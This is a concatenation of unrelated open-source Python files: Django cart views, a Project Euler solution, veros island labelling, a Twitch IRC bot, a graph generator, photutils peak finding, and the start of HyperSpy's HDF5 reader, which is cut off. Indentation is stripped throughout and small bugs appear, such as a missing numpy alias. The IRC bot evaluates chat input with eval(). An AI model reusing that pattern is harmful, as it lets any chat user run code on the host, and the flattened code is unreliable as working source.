import settings as cart_settings
from models import Order
from forms import AddToCartForm, OrderForm, shipping_options_form_factory, order_detail_form_factory, checkout_form_factory
import helpers
render_to_response = helpers.get_render_function()
def index(request):
"""Dummy view for backwards-compatibility - allows reversing of cart.view.index"""
pass
def validate_cart(request, view):
cart = helpers.get_cart()(request)
if view == 'delivery':
return cart.is_valid()
elif view == 'payment':
return bool(Order.objects.filter(pk=cart.data.get('order_pk', None)).count())
def steps(request):
steps = []
if not cart_settings.SKIP_CHECKOUT:
steps.append((reverse('cart.views.checkout'), 'Review Order'))
for step in [
('delivery', 'Delivery Details'),
('payment', 'Payment Details')
]:
if validate_cart(request, step[0]):
steps.append((reverse('cart.views.%s' % step[0]), step[1]))
else:
steps.append((None, step[1]))
return steps
@never_cache
def checkout(request):
"""Display a list of cart items, quantities, total etc, with the option
to change quantities, specify shipping options etc."""
if cart_settings.SKIP_CHECKOUT:
return HttpResponseRedirect(reverse('cart.views.delivery'))
else:
cart = helpers.get_cart()(request)
shipping_options_form_cls = shipping_options_form_factory(cart)
checkout_form_cls = checkout_form_factory()
if request.method == 'POST':
checkout_form = checkout_form_cls(request.POST)
shipping_options_form = shipping_options_form_cls(request.POST, prefix='shipping')
valid = checkout_form.is_valid() and shipping_options_form.is_valid()
if valid:
cart.update_detail_data(checkout_form.cleaned_data)
cart.update_shipping_options(shipping_options_form.cleaned_data)
for item in cart:
# update quantities if changed
q = request.POST.get('quantity-%s' % item.formindex, None)
if q == 'remove':
quantity = 0
else:
try:
quantity = int(q)
except ValueError:
quantity = item['quantity']
if quantity != item['quantity']:
cart.update(item.product, quantity, item['options'])
if request.POST.get('next', False):
redirect_url = reverse(delivery)
else:
redirect_url = request.path_info
if request.is_ajax():
html = render_to_string(
'cart/checkout_ajax.html',
RequestContext(request, {
'cart': cart,
'steps': steps(request),
'current_step': 1,
'checkout_form': checkout_form,
'shipping_options_form': shipping_options_form,
})
)
return HttpResponse(simplejson.dumps({
'success': valid,
'cart': cart.as_dict(),
'redirect_url': redirect_url if valid else None,
'html': html,
}), mimetype='application/json')
elif valid:
return HttpResponseRedirect(redirect_url)
else:
checkout_form = checkout_form_cls(initial=cart.detail_data)
shipping_options_form = shipping_options_form_cls(prefix='shipping', initial=cart.shipping_options)
return render_to_response(
'cart/checkout.html',
RequestContext(request, {
'cart': cart,
'steps': steps(request),
'current_step': 1,
'checkout_form': checkout_form,
'shipping_options_form': shipping_options_form,
})
)
@never_cache
def delivery(request):
"""Collects standard delivery information, along with any extra information
from the order_detail model."""
cart = helpers.get_cart()(request)
order_form_cls = helpers.get_order_form()
detail_cls = helpers.get_order_detail()
if not validate_cart(request, 'delivery'):
return HttpResponseRedirect(reverse(checkout))
else:
try:
instance = Order.objects.get(pk=cart.data.get('order_pk', None))
if detail_cls:
try:
detail_instance = instance.get_detail()
except detail_cls.DoesNotExist:
detail_instance = None
else:
detail_instance = None
except Order.DoesNotExist:
instance = None
detail_instance = None
# get detail form, or dummy form if no ORDER_DETAIL_MODEL defined
detail_form_cls = order_detail_form_factory()
form_kwargs = {'label_suffix': '', 'instance': instance, 'initial': cart.data}
detail_form_kwargs = {'label_suffix': '', 'instance': detail_instance, 'initial': cart.detail_data, 'prefix': 'detail'}
if request.POST:
form = order_form_cls(request.POST, **form_kwargs)
detail_form = detail_form_cls(request.POST, **detail_form_kwargs)
valid = form.is_valid() and detail_form.is_valid()
if valid:
order = form.save(commit=False)
order.session_id = request.session.session_key
order.shipping_cost = cart.shipping_cost()
# save needed here to create the primary key
order.save()
for line in order.orderline_set.all():
line.delete()
for item in cart:
order.orderline_set.create(
product=item.product,
quantity=item['quantity'],
price=item.row_total(),
options=simplejson.dumps(item['options'])
)
# if the form has no 'save' method, assume it's the dummy form
if callable(getattr(detail_form, 'save', None)):
# the detail object may have been created on order save, so check for that
if detail_cls:
try:
detail_form.instance = order.get_detail()
except detail_cls.DoesNotExist:
pass
detail = detail_form.save(commit=False)
detail.order = order # in case it is being created for the first time
for field in cart_settings.CHECKOUT_FORM_FIELDS:
setattr(detail, field, cart.detail_data[field])
detail.save()
# confirmed status can trigger notifications etc, so don't set it until all
# order info is in the database
order.status = 'confirmed'
order.save()
cart.update_data({'order_pk': order.pk})
cart.modified()
redirect_url = reverse('cart.views.payment', args=(order.hash,))
else:
redirect_url = None
if request.is_ajax():
html = render_to_string(
'cart/delivery_ajax.html',
RequestContext(request, {
'cart': cart,
'form': form,
'detail_form': detail_form,
'steps': steps(request),
'current_step': 2,
})
)
return HttpResponse(simplejson.dumps({
'success': valid,
'cart': cart.as_dict(),
'redirect_url': redirect_url,
'hard_redirect': True,
'html': html,
}), mimetype='application/json')
elif valid:
return HttpResponseRedirect(redirect_url)
else:
form = order_form_cls(**form_kwargs)
detail_form = detail_form_cls(**detail_form_kwargs)
return render_to_response(
'cart/delivery.html',
RequestContext(request, {
'cart': cart,
'form': form,
'detail_form': detail_form,
'steps': steps(request),
'current_step': 2,
})
)
@never_cache
def payment(request, order_hash=None, param=None):
"""Handle payments using the specified backend."""
if order_hash:
order = get_object_or_404(Order, hash=order_hash)
else:
cart = helpers.get_cart()(request)
if not validate_cart(request, 'payment'):
return HttpResponseRedirect(reverse('cart.views.delivery'))
else:
# Assume this will work since validate_cart returned True
order = Order.objects.get(pk=cart.data['order_pk'])
return HttpResponseRedirect(reverse('cart.views.payment', args=(order.hash,)))
if order.total():
if cart_settings.PAYMENT_BACKEND:
try:
backend_module = importlib.import_module(cart_settings.PAYMENT_BACKEND)
except ImportError:
# Try old format for backwards-compatibility
backend_module = importlib.import_module('cart.payment.%s' % cart_settings.PAYMENT_BACKEND)
backend = backend_module.PaymentBackend()
return backend.paymentView(request, param, order)
else:
# If no payment backend, assume we're skipping this step
return HttpResponseRedirect(order.get_absolute_url())
else:
order.payment_successful = True
order.save()
return HttpResponseRedirect(order.get_absolute_url())
@never_cache
def complete(request, order_hash):
"""Display completed order information."""
cart = helpers.get_cart()(request)
cart.clear()
order = get_object_or_404(Order, hash=order_hash)
if not order.notification_sent:
notify_body = render_to_string(
'cart/email/order_notify.txt',
RequestContext(request, {
'order': order,
'site': get_current_site(),
})
)
send_mail(
"Order Received",
notify_body,
settings.DEFAULT_FROM_EMAIL,
[t[1] for t in cart_settings.MANAGERS]
)
order.notification_sent = True
order.save()
if order.email and not order.acknowledgement_sent:
acknowledge_body = render_to_string(
'cart/email/order_acknowledge.txt',
RequestContext(request, {
'order': order,
'site': get_current_site(),
})
)
acknowledge_subject = render_to_string(
'cart/email/order_acknowledge_subject.txt',
RequestContext(request, {
'order': order,
'site': get_current_site(),
})
)
try:
acknowledge_body_html = render_to_string('cart/email/order_acknowledge.html',
RequestContext(request, {'order': order, 'site': get_current_site()}))
except TemplateDoesNotExist:
acknowledge_body_html = None
msg = EmailMultiAlternatives(acknowledge_subject,
acknowledge_body,
settings.DEFAULT_FROM_EMAIL,
[order.email])
if acknowledge_body_html:
msg.attach_alternative(acknowledge_body_html, "text/html")
msg.send()
order.acknowledgement_sent = True
order.save()
return render_to_response(
'cart/complete.html',
RequestContext(request, {
'order': order,
})
)
def clear(request):
"""Remove all items from the cart."""
if request.method != 'POST':
return HttpResponseNotAllowed('GET not allowed; POST is required.')
else:
helpers.get_cart()(request).clear()
notification = (messages.SUCCESS, 'Your cart was emptied',)
if request.is_ajax():
response = HttpResponse()
response.write(simplejson.dumps({
'notification': notification
}))
return response
else:
messages.add_message(request, *notification)
return HttpResponseRedirect(request.POST.get('redirect_to', reverse(checkout)))
@never_cache
def update(request):
"""Update cart quantities."""
if request.method != 'POST':
return HttpResponseNotAllowed('GET not allowed; POST is required.')
else:
cart = helpers.get_cart()(request)
for item in cart:
index = 'quantity-%s' % unicode(item.formindex)
if index in request.POST:
try:
quantity = int(request.POST[index])
cart.update(item.product, quantity, item['options'])
except ValueError:
pass
notification = (messages.SUCCESS, 'Cart updated. <a href="%s">View cart</a>' % (reverse(checkout)))
if request.is_ajax():
response = HttpResponse()
data = {
'cart': cart.as_dict(),
'notification': notification,
}
response.write(simplejson.dumps(data))
return response
else:
messages.add_message(request, *notification)
return HttpResponseRedirect(request.POST.get('redirect_to', reverse(checkout)))
def add(request, content_type_id, product_id, form_class=None):
"""Add a product to the cart
POST data should include content_type_id,
"""
if request.method != 'POST':
return HttpResponseNotAllowed(['POST'])
else:
ctype = get_object_or_404(ContentType, pk=content_type_id)
product = get_object_or_404(ctype.model_class(), pk=product_id)
if not form_class:
form_class = helpers.get_add_form(product)
form = form_class(request.POST, product=product)
cart = helpers.get_cart()(request)
if form.is_valid():
form.add(request)
notification = (messages.SUCCESS, 'Product was added to your cart. <a href="%s">View cart</a>' % (reverse(checkout)))
else:
notification = (messages.ERROR, 'Could not add product to cart. \r%s' % form_errors_as_notification(form))
if request.is_ajax():
data = {
'notification': notification,
'cart': cart.as_dict(),
'checkout_url': reverse('cart.views.checkout'),
'delivery_url': reverse('cart.views.delivery'),
}
if form.is_valid():
data.update({
'success': True,
'cart': cart.as_dict(),
'product_pk': product.pk,
'product_name': product.name,
'product_quantity_added': form.get_quantity(),
'product_quantity': cart.get(product, form.get_options())['quantity'],
'total_quantity': cart.quantity(),
})
return HttpResponse(simplejson.dumps(data), mimetype='application/json')
else:
messages.add_message(request, *notification)
if form.is_valid():
return HttpResponseRedirect(request.POST.get('redirect_to', reverse(checkout)))
else:
return HttpResponseRedirect(request.META.get('HTTP_REFERER', reverse(checkout)))
|
bsd-3-clause
| -3,236,693,349,976,724,500
| 35.976496
| 129
| 0.535452
| false
| 4.767218
| false
| false
| false
|
dhermes/project-euler
|
python/complete/no335.py
|
1
|
1809
|
#!/usr/bin/env python
# Since M(2**n + 1) = 4**n + 3**n - 2**(n + 1) (empirically),
# we find sum_{n=0}^{P} M(2**n + 1) is equal to
# (4**(P + 1) - 1)/3 + (3**(P + 1) - 1)/2 + 2*(2**(P + 1) - 1)
# = (4*(4**P) - 1)*(3**(-1)) + (3*(3**P) - 1)*(2**(-1)) + 4*(2**P) - 2
# (This is because (r - 1)*(r**P + ... + r + 1) = r**(P + 1) - 1
from python.decorators import euler_timer
from python.functions import inverse_mod_n
def moves(n):
if n < 3:
return n
goal_state = [1] * n
state = [0, 2] + [1] * (n - 2)
num_moves = 1
last_placed = 1
while state != goal_state:
beans = state[last_placed]
state[last_placed] = 0
for bean in range(1, beans + 1):
next_index = (last_placed + bean) % n
state[next_index] += 1
last_placed = (last_placed + beans) % n
num_moves += 1
return num_moves
def check_formula(n):
return (moves(2 ** n + 1) == 4 ** n - 3 ** n + 2 ** (n + 1))
# Since (a**(n**k))**n = a**(n*(n**k)) = a**(n**(k + 1)),
# We can easily compute X**(P + 1) = X*(X**P) for P = 10**18
def modular_exponentiate(val, exp_base, exp_power, modulus):
result = val
for i in xrange(exp_power):
result = (result ** exp_base) % modulus
return result
def main(verbose=False):
for n in range(10):
if not check_formula(n):
raise Exception("Proposed formula for M(2**k + 1) incorrect.")
modulus = 7 ** 9
p_2 = 4 * modular_exponentiate(2, 10, 18, modulus) - 2
p_3 = 3 * modular_exponentiate(3, 10, 18, modulus) - 1
p_4 = 4 * modular_exponentiate(4, 10, 18, modulus) - 1
return (p_4 * inverse_mod_n(3, modulus) -
p_3 * inverse_mod_n(2, modulus) + p_2) % (modulus)
if __name__ == '__main__':
print euler_timer(335)(main)(verbose=True)
|
apache-2.0
| -1,711,806,754,531,232,000
| 29.15
| 74
| 0.512438
| false
| 2.614162
| false
| false
| false
|
dionhaefner/veros
|
veros/core/streamfunction/island.py
|
1
|
1983
|
import numpy
import scipy.ndimage
from ... import veros_method, runtime_settings as rs
from .. import utilities
@veros_method
def isleperim(vs, kmt, verbose=False):
utilities.enforce_boundaries(vs, kmt)
if rs.backend == 'bohrium':
kmt = kmt.copy2numpy()
structure = numpy.ones((3, 3)) # merge diagonally connected land masses
# find all land masses
labelled, _ = scipy.ndimage.label(kmt == 0, structure=structure)
# find and set perimeter
land_masses = labelled > 0
inner = scipy.ndimage.binary_dilation(land_masses, structure=structure)
perimeter = numpy.logical_xor(inner, land_masses)
labelled[perimeter] = -1
# match wrapping periodic land masses
if vs.enable_cyclic_x:
west_slice = labelled[2]
east_slice = labelled[-2]
for west_label in numpy.unique(west_slice[west_slice > 0]):
east_labels = numpy.unique(east_slice[west_slice == west_label])
east_labels = east_labels[~numpy.isin(east_labels, [west_label, -1])]
if not east_labels.size:
# already labelled correctly
continue
assert len(numpy.unique(east_labels)) == 1, (west_label, east_labels)
labelled[labelled == east_labels[0]] = west_label
utilities.enforce_boundaries(vs, labelled)
# label landmasses in a way that is consistent with pyom
labels = numpy.unique(labelled[labelled > 0])
label_idx = {}
for label in labels:
# find index of first island cell, scanning west to east, north to south
label_idx[label] = np.argmax(labelled[:, ::-1].T == label)
sorted_labels = list(sorted(labels, key=lambda i: label_idx[i]))
# ensure labels are numbered consecutively
relabelled = labelled.copy()
for new_label, label in enumerate(sorted_labels, 1):
if label == new_label:
continue
relabelled[labelled == label] = new_label
return np.asarray(relabelled)
|
mit
| 4,557,765,566,113,674,000
| 32.610169
| 81
| 0.646495
| false
| 3.547406
| false
| false
| false
|
AlessandroMinali/pyIRCbot
|
pyIRCbot.py
|
1
|
2803
|
#Alessandro Minali 2014
# www.alessandrom.me
#questions/suggestions/feedback to: alessandro.minali@gmail.com
##ONLY CHANGE VALUES THAT HAVE COMMENTS BESIDE THEM
import socket
import commands
import moderation
import time
class PyIRCBot():
def __init__(self):
HOST = "irc.twitch.tv"
PORT = 6667
REALNAME = "Bot"
data = self.config()
NICK = data[0] ##This has to be your bots username.
IDENT = data[0] ##Bot username again.
PASS = data[1] ##This has to be your oauth token.
self.CHANNEL = data[2] ##This is the channel your bot will be working on.
self.flag = data[3]
self.s = socket.socket()
self.s.connect((HOST, PORT))
self.s.send("PASS %s\r\n" % PASS)
self.s.send("NICK %s\r\n" % NICK)
self.s.send("USER %s %s bla :%s\r\n" % (IDENT, HOST, REALNAME))
self.s.send("JOIN %s\r\n" % self.CHANNEL)
def run(self):
LAST_MESSAGE = ""
readbuffer = ""
print "Running..."
while(1):
time.sleep(0.3)
readbuffer = readbuffer + self.s.recv(1024)
temp = readbuffer.split("\n")
readbuffer = temp.pop()
self.debug(temp)
for line in temp:
message = line.split(":")
name = message[1].split("!")[0]
ENTIRE_MESSAGE = message[-1]
if(ENTIRE_MESSAGE[0] == "!"):
self.command(ENTIRE_MESSAGE)
elif(line.split()[0].strip(":") == "PING"):
self.s.send("PONG %s\r\n" % line.split()[1])
else:
self.moderate(ENTIRE_MESSAGE, name)
def command(self, msg):
name = msg[1:-1:].split()[0]
try:
ans = eval("commands." + name + "." + name + "(\"" + msg[1:-1:] + "\")")
reply = "PRIVMSG "+ self.CHANNEL + " :" + str(ans) + "\r\n"
self.s.send(reply)
except:
pass
def moderate(self, msg, name):
if moderation.mod.scan(msg):
reply = "PRIVMSG "+ self.CHANNEL + " :" + moderation.mod.timeout(name,200) + "\r\n"
self.s.send(reply)
## reply = "PRIVMSG "+ self.CHANNEL + " :Bad boy, :( you know what you did!\r\n"
## self.s.send(reply)
def config(self):
f = open("config.txt", "r")
data = f.readlines()
j = 0
for i in data:
data[j] = i.split()[-1]
j = j + 1
return data
def debug(self, log):
if int(self.flag):
print log
else:
pass
if __name__ == "__main__":
bot = PyIRCBot()
bot.run()
|
mit
| -26,257,662,847,638,284
| 30.593023
| 95
| 0.475919
| false
| 3.499376
| false
| false
| false
|
yuikns/pattern-counter
|
data/dataset/ER_middle/generate_graph.py
|
1
|
1801
|
import random as ran
import networkx as nx
import Queue
import matplotlib.pyplot as plt
n=150 # number of nodes
p=0.1 # edge selection probability
G=nx.erdos_renyi_graph(n,p)
print "#nodes = ", G.number_of_nodes()
print "#edges = ", G.number_of_edges()
L=1000 # number of logs
influence_probability = 0.35 # activity probability
seed_id = ran.randint(0,n-1)
q = Queue.Queue()
l = 0
q.put((seed_id,0))
G.node[seed_id]['label'] = '0'
logs = []
logs.append((seed_id, 0))
while(not q.empty() and l < L):
l+=1
(node_id, t) = q.get()
neighbors = G.neighbors(node_id)
if len(neighbors) == 0:
node_id = ran.randint(0,n-1)
if G.node[node_id].get('label') != None:
G.node[node_id]['label'] = G.node[node_id].get('label')+"-"+str(t+1)
else:
G.node[node_id]['label'] = str(t+1)
q.put((node_id, t+1))
logs.append((node_id, t+1))
print len(logs)
else:
for neighbor_id in neighbors:
x = ran.random()
if x <= influence_probability:
if G.node[neighbor_id].get('label') != None:
G.node[neighbor_id]['label'] = G.node[neighbor_id].get('label')+"-"+str(t+1)
else:
G.node[neighbor_id]['label'] = str(t+1)
q.put((neighbor_id, t+1))
logs.append((neighbor_id, t+1))
for i in range(G.number_of_nodes()):
print i, " ", G.node[i].get('label')
f = open("graph.txt","w")
f.write(str(G.number_of_nodes())+"\t"+str(G.number_of_edges())+"\n")
for edge in G.edges():
f.write(str(edge[0])+"\t"+str(edge[1])+"\t1.0\n")
f.close()
f = open("node_dict.txt", "w")
for node in range(n):
f.write(str(node)+"\t"+str(node)+"\n")
f.close()
print "#logs = ", len(logs)
f = open("logs.txt", "w")
for log in logs:
f.write(str(log[0])+"\t"+str(log[1])+"\n")
f.close()
nx.draw(G, with_labels=True)
# nx.draw_networkx_labels(G,pos=nx.spring_layout(G))
plt.show()
|
mit
| -1,865,508,281,380,050,700
| 25.101449
| 82
| 0.609661
| false
| 2.391766
| false
| false
| false
|
astropy/photutils
|
photutils/detection/peakfinder.py
|
1
|
7745
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module provides tools for finding local peaks in an astronomical
image.
"""
import warnings
from astropy.table import Table
import numpy as np
from ..utils.exceptions import NoDetectionsWarning
__all__ = ['find_peaks']
def find_peaks(data, threshold, box_size=3, footprint=None, mask=None,
border_width=None, npeaks=np.inf, centroid_func=None,
error=None, wcs=None):
"""
Find local peaks in an image that are above above a specified
threshold value.
Peaks are the maxima above the ``threshold`` within a local region.
The local regions are defined by either the ``box_size`` or
``footprint`` parameters. ``box_size`` defines the local region
around each pixel as a square box. ``footprint`` is a boolean array
where `True` values specify the region shape.
If multiple pixels within a local region have identical intensities,
then the coordinates of all such pixels are returned. Otherwise,
there will be only one peak pixel per local region. Thus, the
defined region effectively imposes a minimum separation between
peaks unless there are identical peaks within the region.
If ``centroid_func`` is input, then it will be used to calculate a
centroid within the defined local region centered on each detected
peak pixel. In this case, the centroid will also be returned in the
output table.
Parameters
----------
data : array_like
The 2D array of the image.
threshold : float or array-like
The data value or pixel-wise data values to be used for the
detection threshold. A 2D ``threshold`` must have the same shape
as ``data``. See `~photutils.segmentation.detect_threshold` for
one way to create a ``threshold`` image.
box_size : scalar or tuple, optional
The size of the local region to search for peaks at every point
in ``data``. If ``box_size`` is a scalar, then the region shape
will be ``(box_size, box_size)``. Either ``box_size`` or
``footprint`` must be defined. If they are both defined, then
``footprint`` overrides ``box_size``.
footprint : `~numpy.ndarray` of bools, optional
A boolean array where `True` values describe the local footprint
region within which to search for peaks at every point in
``data``. ``box_size=(n, m)`` is equivalent to
``footprint=np.ones((n, m))``. Either ``box_size`` or
``footprint`` must be defined. If they are both defined, then
``footprint`` overrides ``box_size``.
mask : array_like, bool, optional
A boolean mask with the same shape as ``data``, where a `True`
value indicates the corresponding element of ``data`` is masked.
border_width : bool, optional
The width in pixels to exclude around the border of the
``data``.
npeaks : int, optional
The maximum number of peaks to return. When the number of
detected peaks exceeds ``npeaks``, the peaks with the highest
peak intensities will be returned.
centroid_func : callable, optional
A callable object (e.g., function or class) that is used to
calculate the centroid of a 2D array. The ``centroid_func``
must accept a 2D `~numpy.ndarray`, have a ``mask`` keyword, and
optionally an ``error`` keyword. The callable object must return
a tuple of two 1D `~numpy.ndarray`\\s, representing the x and y
centroids, respectively.
error : array_like, optional
The 2D array of the 1-sigma errors of the input ``data``.
``error`` is used only if ``centroid_func`` is input (the
``error`` array is passed directly to the ``centroid_func``).
wcs : `None` or WCS object, optional
A world coordinate system (WCS) transformation that
supports the `astropy shared interface for WCS
<https://docs.astropy.org/en/stable/wcs/wcsapi.html>`_
(e.g., `astropy.wcs.WCS`, `gwcs.wcs.WCS`). If `None`, then
the sky coordinates will not be returned in the output
`~astropy.table.Table`.
Returns
-------
output : `~astropy.table.Table` or `None`
A table containing the x and y pixel location of the peaks and
their values. If ``centroid_func`` is input, then the table
will also contain the centroid position. If no peaks are found
then `None` is returned.
"""
from scipy.ndimage import maximum_filter
data = np.asanyarray(data)
if np.all(data == data.flat[0]):
warnings.warn('Input data is constant. No local peaks can be found.',
NoDetectionsWarning)
return None
if not np.isscalar(threshold):
threshold = np.asanyarray(threshold)
if data.shape != threshold.shape:
raise ValueError('A threshold array must have the same shape as '
'the input data.')
# remove NaN values to avoid runtime warnings
nan_mask = np.isnan(data)
if np.any(nan_mask):
data = np.copy(data) # ndarray
data[nan_mask] = np.nanmin(data)
if footprint is not None:
data_max = maximum_filter(data, footprint=footprint, mode='constant',
cval=0.0)
else:
data_max = maximum_filter(data, size=box_size, mode='constant',
cval=0.0)
peak_goodmask = (data == data_max) # good pixels are True
if mask is not None:
mask = np.asanyarray(mask)
if data.shape != mask.shape:
raise ValueError('data and mask must have the same shape')
peak_goodmask = np.logical_and(peak_goodmask, ~mask)
if border_width is not None:
for i in range(peak_goodmask.ndim):
peak_goodmask = peak_goodmask.swapaxes(0, i)
peak_goodmask[:border_width] = False
peak_goodmask[-border_width:] = False
peak_goodmask = peak_goodmask.swapaxes(0, i)
peak_goodmask = np.logical_and(peak_goodmask, (data > threshold))
y_peaks, x_peaks = peak_goodmask.nonzero()
peak_values = data[y_peaks, x_peaks]
nxpeaks = len(x_peaks)
if nxpeaks > npeaks:
idx = np.argsort(peak_values)[::-1][:npeaks]
x_peaks = x_peaks[idx]
y_peaks = y_peaks[idx]
peak_values = peak_values[idx]
if nxpeaks == 0:
warnings.warn('No local peaks were found.', NoDetectionsWarning)
return None
# construct the output Table
colnames = ['x_peak', 'y_peak', 'peak_value']
coldata = [x_peaks, y_peaks, peak_values]
table = Table(coldata, names=colnames)
if wcs is not None:
skycoord_peaks = wcs.pixel_to_world(x_peaks, y_peaks)
table.add_column(skycoord_peaks, name='skycoord_peak', index=2)
# perform centroiding
if centroid_func is not None:
from ..centroids import centroid_sources # prevents circular import
if not callable(centroid_func):
raise TypeError('centroid_func must be a callable object')
x_centroids, y_centroids = centroid_sources(
data, x_peaks, y_peaks, box_size=box_size,
footprint=footprint, error=error, mask=mask,
centroid_func=centroid_func)
table['x_centroid'] = x_centroids
table['y_centroid'] = y_centroids
if wcs is not None:
skycoord_centroids = wcs.pixel_to_world(x_centroids, y_centroids)
idx = table.colnames.index('y_centroid') + 1
table.add_column(skycoord_centroids, name='skycoord_centroid',
index=idx)
return table
|
bsd-3-clause
| 3,252,517,488,236,389,400
| 38.116162
| 77
| 0.634732
| false
| 3.973833
| false
| false
| false
|
ericpre/hyperspy
|
hyperspy/io_plugins/hspy.py
|
1
|
31796
|
# -*- coding: utf-8 -*-
# Copyright 2007-2021 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
from distutils.version import LooseVersion
import warnings
import logging
import datetime
import ast
import h5py
import numpy as np
import dask.array as da
from traits.api import Undefined
from hyperspy.misc.utils import ensure_unicode, multiply, get_object_package_info
from hyperspy.axes import AxesManager
_logger = logging.getLogger(__name__)
# Plugin characteristics
# ----------------------
format_name = 'HSPY'
description = \
'The default file format for HyperSpy based on the HDF5 standard'
full_support = False
# Recognised file extension
file_extensions = ['hspy', 'hdf5']
default_extension = 0
# Writing capabilities
writes = True
version = "3.1"
# -----------------------
# File format description
# -----------------------
# The root must contain a group called Experiments
# The experiments group can contain any number of subgroups
# Each subgroup is an experiment or signal
# Each subgroup must contain at least one dataset called data
# The data is an array of arbitrary dimension
# In addition a number equal to the number of dimensions of the data
# dataset + 1 of empty groups called coordinates followed by a number
# must exists with the following attributes:
# 'name'
# 'offset'
# 'scale'
# 'units'
# 'size'
# 'index_in_array'
# The experiment group contains a number of attributes that will be
# directly assigned as class attributes of the Signal instance. In
# addition the experiment groups may contain 'original_metadata' and
# 'metadata'subgroup that will be
# assigned to the same name attributes of the Signal instance as a
# Dictionary Browsers
# The Experiments group can contain attributes that may be common to all
# the experiments and that will be accessible as attributes of the
# Experiments instance
#
# CHANGES
#
# v3.1
# - move metadata.Signal.binned attribute to axes.is_binned parameter
#
# v3.0
# - add Camera and Stage node
# - move tilt_stage to Stage.tilt_alpha
#
# v2.2
# - store more metadata as string: date, time, notes, authors and doi
# - store quantity for intensity axis
#
# v2.1
# - Store the navigate attribute.
# - record_by is stored only for backward compatibility but the axes navigate
# attribute takes precendence over record_by for files with version >= 2.1
# v1.3
# ----
# - Added support for lists, tuples and binary strings
not_valid_format = 'The file is not a valid HyperSpy hdf5 file'
current_file_version = None # Format version of the file being read
default_version = LooseVersion(version)
def get_hspy_format_version(f):
if "file_format_version" in f.attrs:
version = f.attrs["file_format_version"]
if isinstance(version, bytes):
version = version.decode()
if isinstance(version, float):
version = str(round(version, 2))
elif "Experiments" in f:
# Chances are that this is a HSpy hdf5 file version 1.0
version = "1.0"
elif "Analysis" in f:
# Starting version 2.0 we have "Analysis" field as well
version = "2.0"
else:
raise IOError(not_valid_format)
return LooseVersion(version)
def file_reader(filename, backing_store=False,
lazy=False, **kwds):
"""Read data from hdf5 files saved with the hyperspy hdf5 format specification
Parameters
----------
filename: str
lazy: bool
Load image lazily using dask
**kwds, optional
"""
try:
# in case blosc compression is used
import hdf5plugin
except ImportError:
pass
mode = kwds.pop('mode', 'r')
f = h5py.File(filename, mode=mode, **kwds)
# Getting the format version here also checks if it is a valid HSpy
# hdf5 file, so the following two lines must not be deleted or moved
# elsewhere.
global current_file_version
current_file_version = get_hspy_format_version(f)
global default_version
if current_file_version > default_version:
warnings.warn(
"This file was written using a newer version of the "
"HyperSpy hdf5 file format. I will attempt to load it, but, "
"if I fail, it is likely that I will be more successful at "
"this and other tasks if you upgrade me.")
models_with_signals = []
standalone_models = []
if 'Analysis/models' in f:
try:
m_gr = f.require_group('Analysis/models')
for model_name in m_gr:
if '_signal' in m_gr[model_name].attrs:
key = m_gr[model_name].attrs['_signal']
# del m_gr[model_name].attrs['_signal']
res = hdfgroup2dict(
m_gr[model_name],
lazy=lazy)
del res['_signal']
models_with_signals.append((key, {model_name: res}))
else:
standalone_models.append(
{model_name: hdfgroup2dict(
m_gr[model_name], lazy=lazy)})
except TypeError:
raise IOError(not_valid_format)
experiments = []
exp_dict_list = []
if 'Experiments' in f:
for ds in f['Experiments']:
if isinstance(f['Experiments'][ds], h5py.Group):
if 'data' in f['Experiments'][ds]:
experiments.append(ds)
# Parse the file
for experiment in experiments:
exg = f['Experiments'][experiment]
exp = hdfgroup2signaldict(exg, lazy)
# assign correct models, if found:
_tmp = {}
for (key, _dict) in reversed(models_with_signals):
if key == exg.name:
_tmp.update(_dict)
models_with_signals.remove((key, _dict))
exp['models'] = _tmp
exp_dict_list.append(exp)
for _, m in models_with_signals:
standalone_models.append(m)
exp_dict_list.extend(standalone_models)
if not len(exp_dict_list):
raise IOError('This is not a valid HyperSpy HDF5 file. '
'You can still load the data using a hdf5 reader, '
'e.g. h5py, and manually create a Signal. '
'Please, refer to the User Guide for details')
if not lazy:
f.close()
return exp_dict_list
def hdfgroup2signaldict(group, lazy=False):
global current_file_version
global default_version
if current_file_version < LooseVersion("1.2"):
metadata = "mapped_parameters"
original_metadata = "original_parameters"
else:
metadata = "metadata"
original_metadata = "original_metadata"
exp = {'metadata': hdfgroup2dict(
group[metadata], lazy=lazy),
'original_metadata': hdfgroup2dict(
group[original_metadata], lazy=lazy),
'attributes': {}
}
if "package" in group.attrs:
# HyperSpy version is >= 1.5
exp["package"] = group.attrs["package"]
exp["package_version"] = group.attrs["package_version"]
else:
# Prior to v1.4 we didn't store the package information. Since there
# were already external package we cannot assume any package provider so
# we leave this empty.
exp["package"] = ""
exp["package_version"] = ""
data = group['data']
if lazy:
data = da.from_array(data, chunks=data.chunks)
exp['attributes']['_lazy'] = True
else:
data = np.asanyarray(data)
exp['data'] = data
axes = []
for i in range(len(exp['data'].shape)):
try:
axes.append(dict(group['axis-%i' % i].attrs))
axis = axes[-1]
for key, item in axis.items():
if isinstance(item, np.bool_):
axis[key] = bool(item)
else:
axis[key] = ensure_unicode(item)
except KeyError:
break
if len(axes) != len(exp['data'].shape): # broke from the previous loop
try:
axes = [i for k, i in sorted(iter(hdfgroup2dict(
group['_list_' + str(len(exp['data'].shape)) + '_axes'],
lazy=lazy).items()))]
except KeyError:
raise IOError(not_valid_format)
exp['axes'] = axes
if 'learning_results' in group.keys():
exp['attributes']['learning_results'] = \
hdfgroup2dict(
group['learning_results'],
lazy=lazy)
if 'peak_learning_results' in group.keys():
exp['attributes']['peak_learning_results'] = \
hdfgroup2dict(
group['peak_learning_results'],
lazy=lazy)
# If the title was not defined on writing the Experiment is
# then called __unnamed__. The next "if" simply sets the title
# back to the empty string
if "General" in exp["metadata"] and "title" in exp["metadata"]["General"]:
if '__unnamed__' == exp['metadata']['General']['title']:
exp['metadata']["General"]['title'] = ''
if current_file_version < LooseVersion("1.1"):
# Load the decomposition results written with the old name,
# mva_results
if 'mva_results' in group.keys():
